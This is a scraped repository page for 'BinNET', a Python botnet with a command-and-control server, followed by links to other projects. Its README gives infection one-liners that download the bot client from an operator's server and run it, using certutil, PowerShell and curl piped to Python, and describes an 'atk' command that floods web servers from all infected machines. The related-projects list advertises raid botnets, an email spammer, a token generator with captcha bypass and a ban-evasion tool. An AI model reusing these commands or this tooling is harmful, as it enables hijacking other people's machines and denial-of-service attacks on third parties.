This is a very simple botnet with a CnC server, made by me. Feel free to change anything

Overview

DISCLAIMER: I AM NOT RESPONSIBLE FOR ANY DAMAGE CAUSED BY THIS TOOL.

BinNET

This is a very simple botnet with a CnC server, made by me. Feel free to change anything!

Currently, it works in web servers.

Requirements

  • requests: pip install requests The remaining libraries are included with Python.

Usage

Run python server.py to start listening for incoming connections. It listens by default in port 57849.

To connect machines to your server, you'll first need to change the variable ADDRESS in client.py. In case you want to run this in your own network, replace this variable with your private IP address. If your client machines are outside your intranet, change the variable's value to your server's public IP address. Every time a client connects to the server, it will print a message with the client's IP address.

Infecting devices

Windows:

CMD:
certutil.exe -urlcache -split -f "http(s)://yourip/yourfile" C:\Windows\Temp & python C:\Windows\Temp\yourfile

Downloads the file to the temp directory and runs it. The machine needs to have Python installed.

PowerShell:
Invoke-WebRequest -Uri http://localhost/client.py | Select-Object -ExpandProperty Content | python

Gets the script from your server, and runs it with Python

GNU/Linux:

curl -s -X GET http(s)://yourip/yourfile | python

This reads the file from your server and runs it with Python. It can also run in Windows if the machine has curl installed.

If you are connected to an intranet in the 192.168.1.0/24 range, it will return your private IP. Else, it will return your public IP. I'm currently working on making it work with all private IPs.

Available commands(i'll update them)

list: lists all machines connected.

atk [host] [port] 
   
    : sends multiple requests to the host and port specified. Currently, it only works on 
web servers. Default threads: 100.

print [text]: prints a text in all connected machines.

help: shows this help message, but inside the program.

   

PD: the code is not commented, I'm very lazy.

You might also like...
Discord Auto bumper made in python, just a simple auto bumper that I made.

Discord Auto bumper made in python, just a simple auto bumper that I made.

A simple tool that allows you to change your default AWS CLI profile.
A simple tool that allows you to change your default AWS CLI profile.

Select AWS Profile Select AWS Profile (slapr) is a simple tool that lets you select which AWS Profile you want to use and sets it as the default AWS p

Discord Token Generator - Python (Generates Tokens and Joins your Server Automatically) hCaptcha Bypass **FREE**

Best Discord Token Generator {hCaptcha bypass FREE Unlimited Memberboost} Install few requirements & run main.py it will redirect you to the Download

WallAlley.bot is an open source and free to use financial discord bot originaly build for WallAlley server's community

WallAlley.bot About WallAlley.bot is an open source and free to use financial discord bot originaly build for WallAlley server's community. All data a

A very simple Salesforce.com REST API client for Python

Simple Salesforce Simple Salesforce is a basic Salesforce.com REST API client built for Python 3.5, 3.6, 3.7 and 3.8. The goal is to provide a very lo

A Very Simple Telegram Files Rename Bot by @AbirHasan2005

Rename-Bot This is a very simple Telegram Files Rename Bot by @AbirHasan2005. Features Rename Videos, Files or Audios. Permanent Custom Thumbnail Supp

ESOLinuxAddonManager - Very simple addon manager for Elder Scrolls Online running on Linux.

ESOLinuxAddonManager Very simple addon manager for Elder Scrolls Online running on Linux. Well, more a downloader for now. Currently it's quite ugly b

A bot to get Statistics like the Playercount from your Minecraft-Server on your Discord-Server

Hey Thanks for reading me. Warning: My English is not the best I have programmed this bot to show me statistics about the player numbers and ping of m

This Server Cloner can clone the server you want with all the perms of roles in every particular channel.

Server-Cloner-with-perms 🚀 This Server Cloner can clone the server you want with all the perms of roles in every particular channel. Features Clone C

Owner
null
An simple python script for remove rockstar account for fivem, very useful for cheating or change account for unban from an server, remember change steam account.

This tool is used for be unbanned from servers, u need disconnect the discord, use other steam account and uninstall xbox for be unbanned 100%, it only work for unban in server, not global

MiguDEV 4 Oct 10, 2022
A discord Server Bot made with Python, This bot helps people feel better by inspiring them with motivational quotes or by responding with a great message, also the users of the server can create custom messages by telling the bot with Commands.

A discord Server Bot made with Python, This bot helps people feel better by inspiring them with motivational quotes or by responding with a great message, also the users of the server can create custom messages by telling the bot with Commands.

Aran 1 Oct 13, 2021
This Code is Property of Rehyann Saini. Feel Free to use this Project.

Email-Spammer Rehyann Saini in Collabration With Fe13 Productions This is an easy to use Dev Friendly Email spammer... #Important Things to know..! St

Rehyann Saini 1 Jan 14, 2022
The raid botnet for Telegram

telegram-raid-botnet The raid botnet for Telegram Что нужно сделать перед запуском? Установить модули pip3 install -r requirements.txt Добавить аккаун

Maxim 68 Jan 3, 2023
Start multiple bots using one script. VK RAID BOTNET

MultiRaidBotnet Start multiple bots using one script. VK RAID BOTNET Русский launcher.py - главный скрипт, запускающий весь ботнет config.py - в нём х

null 2 Jul 22, 2022
⚡ PoC: Hide a c&c botnet in the discord client. (Proof Of Concept)

Discord-BotnetClient Embed C&C botnet into the discord client. Working trought websocket c&c server. How to use. pip3 install websocket_server colored

0хVιcнy#1337 37 Oct 21, 2022
This is a very easy to use tool developed in python that will search for free courses from multiple sites including youtube and enroll in the ones in which it can.

Free-Course-Hunter-and-Enroller This is a very easy to use tool developed in python that will search for free courses from multiple sites including yo

Zain 12 Nov 12, 2022
A Anything goes Discord bot written in python and uses the wrapper Discord.py

GerardTheWizard A Anything goes Discord bot written in python and uses the wrapper Discord.py What can he do? Allow users to level up through typing,

null 1 May 5, 2022
TESSARECT A Powerful Bot you'll ever need for anything

Tessarect TESSARECT A Powerful Bot you'll ever need for anything TESSARECT It is my First bot but very advanced and designed for all your needs , from

Prakarsh Prp 4 Aug 27, 2022
(unofficial) Googletrans: Free and Unlimited Google translate API for Python. Translates totally free of charge.

Googletrans Googletrans is a free and unlimited python library that implemented Google Translate API. This uses the Google Translate Ajax API to make

Suhun Han 3.2k Jan 4, 2023